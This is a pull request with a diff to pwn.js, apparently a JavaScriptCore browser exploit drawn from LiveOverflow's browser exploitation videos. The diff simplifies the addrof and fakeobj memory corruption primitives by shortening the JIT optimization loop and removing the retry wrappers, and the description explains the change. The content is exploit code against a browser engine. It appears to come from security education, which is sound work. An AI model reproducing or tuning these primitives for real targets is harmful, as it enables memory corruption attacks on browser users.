### PR TITLE
Fix addrof and fakeobj internal functions in pwn.js so that they don't have to be called twice.

### DIFF
--- a/pwn.js
+++ b/pwn.js
@@ -6,7 +6,7 @@ a[0] = {};
 //
 // addrof primitive
 //
-function addrofInternal(val) {
+function addrof(val) {
     var array = [13.37];
     var reg = /abc/y;
     
@@ -28,7 +28,7 @@ function addrofInternal(val) {
     }
     
     // Force optimization
-    for (var i = 0; i < 100000; ++i)
+    for (var i = 0; i < 10000; ++i) // fixed
         AddrGetter(array);
     
     // Setup haxx
@@ -43,23 +43,10 @@ function addrofInternal(val) {
     return AddrGetter(array);
 }
 
-// Need to wrap addrof in this wrapper because it sometimes fails (don't know why, but this works)
-function addrof(val) {
-    for (var i = 0; i < 100; i++) {
-        var result = addrofInternal(val);
-        if (typeof result != "object" && result !== 13.37){
-            return result;
-        }
-    }
-    
-    print("[-] Addrof didn't work. Prepare for WebContent to crash or other strange stuff to happen...");
-    throw "See above";
-}
-
 //
 // fakeobj primitive
 //
-function fakeobjInternal(val) {
+function fakeobj(val) {
     var array = [13.37];
     var reg = /abc/y;
     
@@ -81,7 +68,7 @@ function fakeobjInternal(val) {
     }
     
     // Force optimization
-    for (var i = 0; i < 100000; ++i)
+    for (var i = 0; i < 10000; ++i)
         ObjFaker(array);
     
     // Setup haxx
@@ -96,19 +83,6 @@ function fakeobjInternal(val) {
     var unused = ObjFaker(array);
     
     return array[0];
-}
-
-// Need to wrap fakeobj in this wrapper because it sometimes fails (don't know why, but this works)
-function fakeobj(val) {
-    for (var i = 0; i < 1000; i++) {
-        var result = fakeobjInternal(val);
-        if (typeof result == "object"){
-            return result;
-        }
-    }
-    
-    print("[-] Fakeobj didn't work. Prepare for WebContent to crash or other strange stuff to happen...");
-    throw "See above";
 }
 
 function makeJITCompiledFunction() {


### PR DESCRIPTION
The addrof and fakeobj internal functions have to be called twice because they call AddrGetter too many times.
The fix was to make it so that it is only called 10,000 times instead of 100,000.
Change:
```
for (var i = 0; i < 100000; ++i)
     AddrGetter(array);
```
to
```
for (var i = 0; i < 10000; ++i) // fixed
     AddrGetter(array);
```
This happens because the function is compiled with the DFG and FTL JIT when you call it 100,000 times and when it is called only 10,000 times it is only compiled with the DFG JIT.
I don't know why this works but it does.

All this work was done by @LiveOverflow.
He made these changes in his browser exploitation video series and I just decided to make then into a pull request.
The original code is at https://gist.github.com/LiveOverflow/ee5fb772334ec985094f77c91be60492.